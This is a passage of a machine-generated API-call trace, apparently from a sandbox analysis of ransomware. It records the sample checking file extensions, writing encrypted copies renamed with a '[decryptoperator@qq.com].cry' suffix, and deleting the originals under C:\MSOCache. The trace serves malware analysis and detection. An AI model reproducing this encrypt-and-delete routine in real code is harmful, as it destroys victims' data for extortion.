[0036.010] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.010] SetEndOfFile (hFile=0x180) returned 1 [0036.011] CloseHandle (hObject=0x180) returned 1 [0036.011] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.011] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.011] lstrlenW (lpString=".doc") returned 4 [0036.011] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.011] lstrlenW (lpString=".docx") returned 5 [0036.011] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.011] lstrlenW (lpString=".pdf") returned 4 [0036.011] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.011] lstrlenW (lpString=".xls") returned 4 [0036.011] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.011] lstrlenW (lpString=".xlsx") returned 5 [0036.012] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.012] lstrlenW (lpString=".ppt") returned 4 [0036.012] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".zip") returned 4 [0036.012] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.012] lstrlenW (lpString=".rar") returned 4 [0036.012] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString=".bz2") returned 4 [0036.012] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString=".7z") returned 3 [0036.012] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".dbf") returned 4 [0036.012] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".1cd") returned 4 [0036.012] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".jpg") returned 4 [0036.012] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".doc") returned 4 [0036.012] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString=".docx") returned 5 [0036.012] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.012] lstrlenW (lpString=".pdf") returned 4 [0036.012] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString=".xls") returned 4 [0036.012] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString=".xlsx") returned 5 [0036.012] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.012] lstrlenW (lpString=".ppt") returned 4 [0036.012] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.012] lstrlenW (lpString=".zip") returned 4 [0036.012] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.013] lstrlenW (lpString=".rar") returned 4 [0036.013] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.013] lstrlenW (lpString=".bz2") returned 4 [0036.013] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.013] lstrlenW (lpString=".7z") returned 3 [0036.013] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.013] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.013] lstrlenW (lpString=".dbf") returned 4 [0036.013] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.013] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.013] lstrlenW (lpString=".1cd") returned 4 [0036.013] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.013] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.013] lstrlenW (lpString=".jpg") returned 4 [0036.013] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.013] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.013] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0036.013] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.014] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5557) returned 1 [0036.014] CloseHandle (hObject=0x180) returned 1 [0036.014] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0036.014] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.014] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.014] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.014] GetLastError () returned 0x0 [0036.014] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x15b5, lpOverlapped=0x0) returned 1 [0036.022] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0036.023] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.023] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xee, lpOverlapped=0x0) returned 1 [0036.023] SetEndOfFile (hFile=0x184) returned 1 [0036.023] CloseHandle (hObject=0x184) returned 1 [0036.023] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.023] SetEndOfFile (hFile=0x180) returned 1 [0036.024] CloseHandle (hObject=0x180) returned 1 [0036.024] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.025] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0036.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.025] lstrlenW (lpString=".doc") returned 4 [0036.025] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString=".docx") returned 5 [0036.025] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.025] lstrlenW (lpString=".pdf") returned 4 [0036.025] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString=".xls") returned 4 [0036.025] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString=".xlsx") returned 5 [0036.025] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.025] lstrlenW (lpString=".ppt") returned 4 [0036.025] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.025] lstrlenW (lpString=".zip") returned 4 [0036.025] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.025] lstrlenW (lpString=".rar") returned 4 [0036.025] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString=".bz2") returned 4 [0036.025] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString=".7z") returned 3 [0036.025] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.025] lstrlenW (lpString=".dbf") returned 4 [0036.025] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.025] lstrlenW (lpString=".1cd") returned 4 [0036.026] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".jpg") returned 4 [0036.026] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".doc") returned 4 [0036.026] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString=".docx") returned 5 [0036.026] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.026] lstrlenW (lpString=".pdf") returned 4 [0036.026] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString=".xls") returned 4 [0036.026] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString=".xlsx") returned 5 [0036.026] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.026] lstrlenW (lpString=".ppt") returned 4 [0036.026] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".zip") returned 4 [0036.026] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.026] lstrlenW (lpString=".rar") returned 4 [0036.026] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString=".bz2") returned 4 [0036.026] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString=".7z") returned 3 [0036.026] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".dbf") returned 4 [0036.026] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".1cd") returned 4 [0036.026] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.026] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0036.026] lstrlenW (lpString=".jpg") returned 4 [0036.026] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.027] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.027] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0036.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.027] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=819) returned 1 [0036.027] CloseHandle (hObject=0x180) returned 1 [0036.027] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0036.027] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.027] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.027] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.027] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.027] GetLastError () returned 0x0 [0036.027] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x333, lpOverlapped=0x0) returned 1 [0036.067] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x340, lpOverlapped=0x0) returned 1 [0036.068] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.068] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0036.068] SetEndOfFile (hFile=0x184) returned 1 [0036.068] CloseHandle (hObject=0x184) returned 1 [0036.069] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.069] SetEndOfFile (hFile=0x180) returned 1 [0036.070] CloseHandle (hObject=0x180) returned 1 [0036.070] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.070] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0036.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.070] lstrlenW (lpString=".doc") returned 4 [0036.070] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.070] lstrlenW (lpString=".docx") returned 5 [0036.070] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.070] lstrlenW (lpString=".pdf") returned 4 [0036.070] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.070] lstrlenW (lpString=".xls") returned 4 [0036.070] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.070] lstrlenW (lpString=".xlsx") returned 5 [0036.070] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.070] lstrlenW (lpString=".ppt") returned 4 [0036.070] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.070] lstrlenW (lpString=".zip") returned 4 [0036.070] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.070] lstrlenW (lpString=".rar") returned 4 [0036.071] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".bz2") returned 4 [0036.071] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".7z") returned 3 [0036.071] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString=".dbf") returned 4 [0036.071] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString=".1cd") returned 4 [0036.071] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString=".jpg") returned 4 [0036.071] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString=".doc") returned 4 [0036.071] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".docx") returned 5 [0036.071] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0036.071] lstrlenW (lpString=".pdf") returned 4 [0036.071] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".xls") returned 4 [0036.071] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".xlsx") returned 5 [0036.071] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0036.071] lstrlenW (lpString=".ppt") returned 4 [0036.071] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.071] lstrlenW (lpString=".zip") returned 4 [0036.071] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.071] lstrlenW (lpString=".rar") returned 4 [0036.071] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.071] lstrlenW (lpString=".bz2") returned 4 [0036.072] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.072] lstrlenW (lpString=".7z") returned 3 [0036.072] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.072] lstrlenW (lpString=".dbf") returned 4 [0036.072] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.072] lstrlenW (lpString=".1cd") returned 4 [0036.072] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0036.072] lstrlenW (lpString=".jpg") returned 4 [0036.072] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.072] lstrcmpiW (lpString1=".chm", lpString2=".cry") returned -1 [0036.072] lstrlenW (lpString="pss10r.chm") returned 10 [0036.072] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.073] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=27195) returned 1 [0036.073] CloseHandle (hObject=0x180) returned 1 [0036.073] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0036.073] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.073] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.073] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.073] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.073] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.073] GetLastError () returned 0x0 [0036.073] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0036.076] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0036.077] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.077] WriteFile (in: hFile=0x184, 